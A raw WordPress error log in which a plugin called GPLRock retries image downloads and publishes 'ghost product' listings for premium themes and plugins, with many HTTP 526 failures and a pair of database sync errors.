HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:46:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sky-mega-menu-30083.webp for product sky-mega-menu after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:46:13 UTC] GPLRock WARNING: Image download failed for product sky-mega-menu. URL: https://meldwp.com/wp-content/uploads/sky-mega-menu-30083.webp [05-Apr-2026 01:46:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sky-mega-menu [05-Apr-2026 01:46:13 UTC] GPLRock: Image download failed for product woocommerce-google-merchant-center-integration (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:46:15 UTC] GPLRock: Image download failed for product woocommerce-google-merchant-center-integration (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:46:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-google-merchant-center-integration-13714.webp for product woocommerce-google-merchant-center-integration after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:46:17 UTC] GPLRock: Image download failed for product woocommerce-google-merchant-center-integration (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:46:19 UTC] GPLRock: Image download failed for product woocommerce-google-merchant-center-integration (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:46:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-google-merchant-center-integration-13714.webp for product woocommerce-google-merchant-center-integration after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:46:21 UTC] GPLRock WARNING: Image download failed for product woocommerce-google-merchant-center-integration. URL: https://meldwp.com/wp-content/uploads/woocommerce-google-merchant-center-integration-13714.webp [05-Apr-2026 01:46:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-google-merchant-center-integration [05-Apr-2026 01:46:21 UTC] GPLRock: Image downloaded successfully for product auto-grid-responsive-gallery (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a6867c99.webp [05-Apr-2026 01:46:21 UTC] GPLRock: Using pre-downloaded image for product auto-grid-responsive-gallery: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a6867c99.webp [05-Apr-2026 01:46:21 UTC] GPLRock: Ghost product published with image - Product ID: auto-grid-responsive-gallery [05-Apr-2026 01:46:21 UTC] GPLRock: Image downloaded successfully for product woocommerce-gift-card (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7b2972c1.webp [05-Apr-2026 01:46:21 UTC] GPLRock: Using pre-downloaded image for product woocommerce-gift-card: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7b2972c1.webp [05-Apr-2026 01:46:21 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-gift-card [05-Apr-2026 01:46:22 UTC] GPLRock: Image download failed for product mailchimp-discount-for-easy-digital-downloads (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:46:24 UTC] GPLRock: Image download failed for product mailchimp-discount-for-easy-digital-downloads (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:46:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mailchimp-discount-for-easy-digital-downloads-2606.webp for product mailchimp-discount-for-easy-digital-downloads after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:46:26 UTC] GPLRock: Image download failed for product mailchimp-discount-for-easy-digital-downloads (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:46:28 UTC] GPLRock: Image download failed for product mailchimp-discount-for-easy-digital-downloads (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:46:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mailchimp-discount-for-easy-digital-downloads-2606.webp for product mailchimp-discount-for-easy-digital-downloads after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:46:30 UTC] GPLRock WARNING: Image download failed for product mailchimp-discount-for-easy-digital-downloads. URL: https://meldwp.com/wp-content/uploads/mailchimp-discount-for-easy-digital-downloads-2606.webp [05-Apr-2026 01:46:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mailchimp-discount-for-easy-digital-downloads [05-Apr-2026 01:46:30 UTC] GPLRock: Image download failed for product tmfeed-wordpress-embeddable-post-widgets-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:46:32 UTC] GPLRock: Image download failed for product tmfeed-wordpress-embeddable-post-widgets-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:46:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tmfeed---wordpress-embeddable-post-widgets-for-elementor-26526.webp for product tmfeed-wordpress-embeddable-post-widgets-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:46:35 UTC] GPLRock: Image download failed for product tmfeed-wordpress-embeddable-post-widgets-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:46:37 UTC] GPLRock: Image download failed for product tmfeed-wordpress-embeddable-post-widgets-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:46:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tmfeed---wordpress-embeddable-post-widgets-for-elementor-26526.webp for product tmfeed-wordpress-embeddable-post-widgets-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:46:39 UTC] GPLRock WARNING: Image download failed for product tmfeed-wordpress-embeddable-post-widgets-for-elementor. URL: https://meldwp.com/wp-content/uploads/tmfeed---wordpress-embeddable-post-widgets-for-elementor-26526.webp [05-Apr-2026 01:46:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tmfeed-wordpress-embeddable-post-widgets-for-elementor [05-Apr-2026 01:47:40 UTC] GPLRock: Image downloaded successfully for product css-igniter-mozzy-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c35d37f3.jpg [05-Apr-2026 01:47:40 UTC] GPLRock: Using pre-downloaded image for product css-igniter-mozzy-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c35d37f3.jpg [05-Apr-2026 01:47:40 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-mozzy-wordpress-theme [05-Apr-2026 01:47:42 UTC] GPLRock: Image downloaded successfully for product yith-multiple-shipping-addresses-for-woocommerce-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-abc8894b.jpg [05-Apr-2026 01:47:42 UTC] GPLRock: Using pre-downloaded image for product yith-multiple-shipping-addresses-for-woocommerce-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-abc8894b.jpg [05-Apr-2026 01:47:42 UTC] GPLRock: Ghost product published with image - Product ID: yith-multiple-shipping-addresses-for-woocommerce-premium [05-Apr-2026 01:47:44 UTC] GPLRock: Image downloaded successfully for product improved-sale-badges-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e41f4fbf.jpg [05-Apr-2026 01:47:44 UTC] GPLRock: Using pre-downloaded image for product improved-sale-badges-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e41f4fbf.jpg [05-Apr-2026 01:47:44 UTC] GPLRock: Ghost product published with image - Product ID: improved-sale-badges-for-woocommerce [05-Apr-2026 01:47:45 UTC] GPLRock: Image downloaded successfully for product popup-maker-scroll-triggered-popups (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-74f42230.jpg [05-Apr-2026 01:47:45 UTC] GPLRock: Using pre-downloaded image for product popup-maker-scroll-triggered-popups: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-74f42230.jpg [05-Apr-2026 01:47:45 UTC] GPLRock: Ghost product published with image - Product ID: popup-maker-scroll-triggered-popups [05-Apr-2026 01:47:46 UTC] GPLRock: Image downloaded successfully for product gravity-forms-signature-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-82b9194e.jpg [05-Apr-2026 01:47:46 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-signature-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-82b9194e.jpg [05-Apr-2026 01:47:46 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-signature-addon [05-Apr-2026 01:47:48 UTC] GPLRock: Image downloaded successfully for product searchwp-like-terms (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fcfbf79e.jpg [05-Apr-2026 01:47:48 UTC] GPLRock: Using pre-downloaded image for product searchwp-like-terms: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fcfbf79e.jpg [05-Apr-2026 01:47:48 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-like-terms [05-Apr-2026 01:47:50 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-share-for-discounts-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9248e9a8.jpg [05-Apr-2026 01:47:50 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-share-for-discounts-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9248e9a8.jpg [05-Apr-2026 01:47:50 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-share-for-discounts-premium [05-Apr-2026 01:47:51 UTC] GPLRock: Image downloaded successfully for product cartback-woocommerce-abandoned-cart-remarketing-in-facebook-messenger (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8ceb2906.jpg [05-Apr-2026 01:47:51 UTC] GPLRock: Using pre-downloaded image for product cartback-woocommerce-abandoned-cart-remarketing-in-facebook-messenger: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8ceb2906.jpg [05-Apr-2026 01:47:51 UTC] GPLRock: Ghost product published with image - Product ID: cartback-woocommerce-abandoned-cart-remarketing-in-facebook-messenger [05-Apr-2026 01:47:52 UTC] GPLRock: Image downloaded successfully for product wpmu-dev-domain-mapping (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5036288c.jpg [05-Apr-2026 01:47:52 UTC] GPLRock: Using pre-downloaded image for product wpmu-dev-domain-mapping: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5036288c.jpg [05-Apr-2026 01:47:52 UTC] GPLRock: Ghost product published with image - Product ID: wpmu-dev-domain-mapping [05-Apr-2026 01:47:54 UTC] GPLRock: Image downloaded successfully for product ninja-forms-zoho-creator (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d3b51bef.jpg [05-Apr-2026 01:47:54 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-zoho-creator: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d3b51bef.jpg [05-Apr-2026 01:47:54 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-zoho-creator [05-Apr-2026 01:49:36 UTC] GPLRock: Image download failed for product saxon-viral-content-blog-magazine-marketing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:49:38 UTC] GPLRock: Image download failed for product saxon-viral-content-blog-magazine-marketing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:49:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/saxon---viral-content-blog--magazine-marketing-wordpress-theme-28531.webp for product saxon-viral-content-blog-magazine-marketing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:49:40 UTC] GPLRock: Image download failed for product saxon-viral-content-blog-magazine-marketing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:49:42 UTC] GPLRock: Image download failed for product saxon-viral-content-blog-magazine-marketing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:49:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/saxon---viral-content-blog--magazine-marketing-wordpress-theme-28531.webp for product saxon-viral-content-blog-magazine-marketing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:49:44 UTC] GPLRock WARNING: Image download failed for product saxon-viral-content-blog-magazine-marketing-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/saxon---viral-content-blog--magazine-marketing-wordpress-theme-28531.webp [05-Apr-2026 01:49:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: saxon-viral-content-blog-magazine-marketing-wordpress-theme [05-Apr-2026 01:49:44 UTC] GPLRock: Image download failed for product musize-creative-music-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:49:47 UTC] GPLRock: Image download failed for product musize-creative-music-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:49:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/musize---creative-music-wordpress-theme-21083.webp for product musize-creative-music-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:49:49 UTC] GPLRock: Image download failed for product musize-creative-music-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:49:51 UTC] GPLRock: Image download failed for product musize-creative-music-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:49:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/musize---creative-music-wordpress-theme-21083.webp for product musize-creative-music-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:49:53 UTC] GPLRock WARNING: Image download failed for product musize-creative-music-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/musize---creative-music-wordpress-theme-21083.webp [05-Apr-2026 01:49:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: musize-creative-music-wordpress-theme [05-Apr-2026 01:49:53 UTC] GPLRock: Image downloaded successfully for product knost-creative-agency-portfolio-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-92dd9cbe.webp [05-Apr-2026 01:49:53 UTC] GPLRock: Using pre-downloaded image for product knost-creative-agency-portfolio-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-92dd9cbe.webp [05-Apr-2026 01:49:53 UTC] GPLRock: Ghost product published with image - Product ID: knost-creative-agency-portfolio-wordpress-theme [05-Apr-2026 01:49:53 UTC] GPLRock: Image download failed for product voisen-woocommerce-responsive-fashion-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:49:55 UTC] GPLRock: Image download failed for product voisen-woocommerce-responsive-fashion-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:59:51 UTC] GPLRock: Image downloaded successfully for product wpestate-real-estate-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c29192c2.jpg [05-Apr-2026 01:59:51 UTC] GPLRock: Using pre-downloaded image for product wpestate-real-estate-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c29192c2.jpg [05-Apr-2026 01:59:51 UTC] GPLRock: Ghost product published with image - Product ID: wpestate-real-estate-wordpress-theme [05-Apr-2026 01:59:53 UTC] GPLRock: Image downloaded successfully for product flex-mag-responsive-wordpress-news-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d839734d.jpg [05-Apr-2026 01:59:53 UTC] GPLRock: Using pre-downloaded image for product flex-mag-responsive-wordpress-news-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d839734d.jpg [05-Apr-2026 01:59:53 UTC] GPLRock: Ghost product published with image - Product ID: flex-mag-responsive-wordpress-news-theme [05-Apr-2026 01:59:54 UTC] GPLRock: Image downloaded successfully for product ninja-forms-pdf-form-submission (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ffbd8dcb.jpg [05-Apr-2026 01:59:54 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-pdf-form-submission: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ffbd8dcb.jpg [05-Apr-2026 01:59:54 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-pdf-form-submission [05-Apr-2026 01:59:56 UTC] GPLRock: Image downloaded successfully for product passion-blogger-a-responsive-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f531b1b2.png [05-Apr-2026 01:59:57 UTC] GPLRock: Using pre-downloaded image for product passion-blogger-a-responsive-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f531b1b2.png [05-Apr-2026 01:59:57 UTC] GPLRock: Ghost product published with image - Product ID: passion-blogger-a-responsive-wordpress-theme [05-Apr-2026 01:59:58 UTC] GPLRock: Image downloaded successfully for product dgwork-business-theme-for-easy-digital-downloads (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1126ffa1.jpg [05-Apr-2026 01:59:58 UTC] GPLRock: Using pre-downloaded image for product dgwork-business-theme-for-easy-digital-downloads: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1126ffa1.jpg [05-Apr-2026 01:59:58 UTC] GPLRock: Ghost product published with image - Product ID: dgwork-business-theme-for-easy-digital-downloads [05-Apr-2026 02:00:00 UTC] GPLRock: Image downloaded successfully for product domnoo-pizza-restaurant-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1f56e936.jpg [05-Apr-2026 02:00:00 UTC] GPLRock: Using pre-downloaded image for product domnoo-pizza-restaurant-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1f56e936.jpg [05-Apr-2026 02:00:00 UTC] GPLRock: Ghost product published with image - Product ID: domnoo-pizza-restaurant-wordpress-theme [05-Apr-2026 02:00:02 UTC] GPLRock: Image downloaded successfully for product cooksy-kitchen-store-appliances-shopify-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-586c6a26.png [05-Apr-2026 02:00:02 UTC] GPLRock: Using pre-downloaded image for product cooksy-kitchen-store-appliances-shopify-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-586c6a26.png [05-Apr-2026 02:00:02 UTC] GPLRock: Ghost product published with image - Product ID: cooksy-kitchen-store-appliances-shopify-theme [05-Apr-2026 02:00:04 UTC] GPLRock: Image downloaded successfully for product coinpress-ico-cryptocurrency-magazine-blog-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4530d11e.avif [05-Apr-2026 02:00:04 UTC] GPLRock: Using pre-downloaded image for product coinpress-ico-cryptocurrency-magazine-blog-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4530d11e.avif [05-Apr-2026 02:00:04 UTC] GPLRock: Ghost product published with image - Product ID: coinpress-ico-cryptocurrency-magazine-blog-wordpress-theme [05-Apr-2026 02:00:06 UTC] GPLRock: Image downloaded successfully for product bridge-creative-multipurpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3a22b92c.png [05-Apr-2026 02:00:06 UTC] GPLRock: Using pre-downloaded image for product bridge-creative-multipurpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3a22b92c.png [05-Apr-2026 02:00:06 UTC] GPLRock: Ghost product published with image - Product ID: bridge-creative-multipurpose-wordpress-theme [05-Apr-2026 02:00:08 UTC] GPLRock: Image downloaded successfully for product nonprofit-profund-charity-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d5388cdb.png [05-Apr-2026 02:00:09 UTC] GPLRock: Using pre-downloaded image for product nonprofit-profund-charity-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d5388cdb.png [05-Apr-2026 02:00:09 UTC] GPLRock: Ghost product published with image - Product ID: nonprofit-profund-charity-theme [05-Apr-2026 02:00:10 UTC] WordPress database error Commands out of sync; you can't run this command now for query SELECT option_name, option_value FROM wpwf_options WHERE option_name IN ('_transient_doing_cron','_transient_timeout_doing_cron') made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, get_transient, wp_prime_option_caches [05-Apr-2026 02:00:10 UTC] WordPress database error Commands out of sync; you can't run this command now for query INSERT INTO `wpwf_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_doing_cron', '1775354410.2009220123291015625000', 'on') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, set_transient, add_option [05-Apr-2026 02:01:19 UTC] GPLRock: Image downloaded successfully for product mythemeshop-myblog-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-651ba069.jpg [05-Apr-2026 02:01:19 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-myblog-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-651ba069.jpg [05-Apr-2026 02:01:19 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-myblog-wordpress-theme [05-Apr-2026 02:01:21 UTC] GPLRock: Image downloaded successfully for product forgravity-entry-automation-for-gravity-forms (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-702f8323.jpg [05-Apr-2026 02:01:21 UTC] GPLRock: Using pre-downloaded image for product forgravity-entry-automation-for-gravity-forms: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-702f8323.jpg [05-Apr-2026 02:01:21 UTC] GPLRock: Ghost product published with image - Product ID: forgravity-entry-automation-for-gravity-forms [05-Apr-2026 02:01:23 UTC] GPLRock: Image downloaded successfully for product qube-responsive-multi-purpose-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ac1f4f64.jpg [05-Apr-2026 02:01:23 UTC] GPLRock: Using pre-downloaded image for product qube-responsive-multi-purpose-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ac1f4f64.jpg [05-Apr-2026 02:01:23 UTC] GPLRock: Ghost product published with image - Product ID: qube-responsive-multi-purpose-theme [05-Apr-2026 02:01:24 UTC] GPLRock: Image downloaded successfully for product super-forms-register-login (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7e67120b.jpg [05-Apr-2026 02:01:24 UTC] GPLRock: Using pre-downloaded image for product super-forms-register-login: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7e67120b.jpg [05-Apr-2026 02:01:24 UTC] GPLRock: Ghost product published with image - Product ID: super-forms-register-login [05-Apr-2026 02:01:25 UTC] GPLRock: Image downloaded successfully for product woocommerce-frontend-manager-affiliate (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aba2b99f.jpg [05-Apr-2026 02:01:25 UTC] GPLRock: Using pre-downloaded image for product woocommerce-frontend-manager-affiliate: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aba2b99f.jpg [05-Apr-2026 02:01:25 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-frontend-manager-affiliate [05-Apr-2026 02:01:27 UTC] GPLRock: Image downloaded successfully for product pearl-corporate-business-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-adeb7e4e.jpg [05-Apr-2026 02:01:27 UTC] GPLRock: Using pre-downloaded image for product pearl-corporate-business-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-adeb7e4e.jpg [05-Apr-2026 02:01:27 UTC] GPLRock: Ghost product published with image - Product ID: pearl-corporate-business-wordpress-theme [05-Apr-2026 02:01:28 UTC] GPLRock: Image downloaded successfully for product amory-a-responsive-wordpress-blog-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7d794741.jpg [05-Apr-2026 02:01:28 UTC] GPLRock: Using pre-downloaded image for product amory-a-responsive-wordpress-blog-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7d794741.jpg [05-Apr-2026 02:01:28 UTC] GPLRock: Ghost product published with image - Product ID: amory-a-responsive-wordpress-blog-theme [05-Apr-2026 02:01:30 UTC] GPLRock: Image downloaded successfully for product kadence-pro-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-37b6f26a.webp [05-Apr-2026 02:01:30 UTC] GPLRock: Using pre-downloaded image for product kadence-pro-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-37b6f26a.webp [05-Apr-2026 02:01:30 UTC] GPLRock: Ghost product published with image - Product ID: kadence-pro-addon [05-Apr-2026 02:01:32 UTC] GPLRock: Image downloaded successfully for product udema-educational-site-template (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aa3b63e5.jpg [05-Apr-2026 02:01:32 UTC] GPLRock: Using pre-downloaded image for product udema-educational-site-template: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aa3b63e5.jpg [05-Apr-2026 02:01:32 UTC] GPLRock: Ghost product published with image - Product ID: udema-educational-site-template [05-Apr-2026 02:01:34 UTC] GPLRock: Image downloaded successfully for product smart-content-protector-pro-wp-copy-protection (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d99b5d17.jpg [05-Apr-2026 02:01:34 UTC] GPLRock: Using pre-downloaded image for product smart-content-protector-pro-wp-copy-protection: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d99b5d17.jpg [05-Apr-2026 02:01:34 UTC] GPLRock: Ghost product published with image - Product ID: smart-content-protector-pro-wp-copy-protection [05-Apr-2026 02:02:32 UTC] GPLRock: Image download failed for product studyhub-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:02:34 UTC] GPLRock: Image download failed for product studyhub-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:02:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/studyhub---education-wordpress-theme-32097.webp for product studyhub-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:02:36 UTC] GPLRock: Image download failed for product studyhub-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:02:39 UTC] GPLRock: Image download failed for product studyhub-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:02:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/studyhub---education-wordpress-theme-32097.webp for product studyhub-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:02:41 UTC] GPLRock WARNING: Image download failed for product studyhub-education-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/studyhub---education-wordpress-theme-32097.webp [05-Apr-2026 02:02:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: studyhub-education-wordpress-theme [05-Apr-2026 02:02:41 UTC] GPLRock: Image download failed for product kids-baby-shop-store-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:02:43 UTC] GPLRock: Image download failed for product kids-baby-shop-store-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:02:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kids---baby-shop--store-woocommerce-theme-9074.webp for product kids-baby-shop-store-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:02:45 UTC] GPLRock: Image download failed for product kids-baby-shop-store-woocommerce-theme (attempt 1/3). 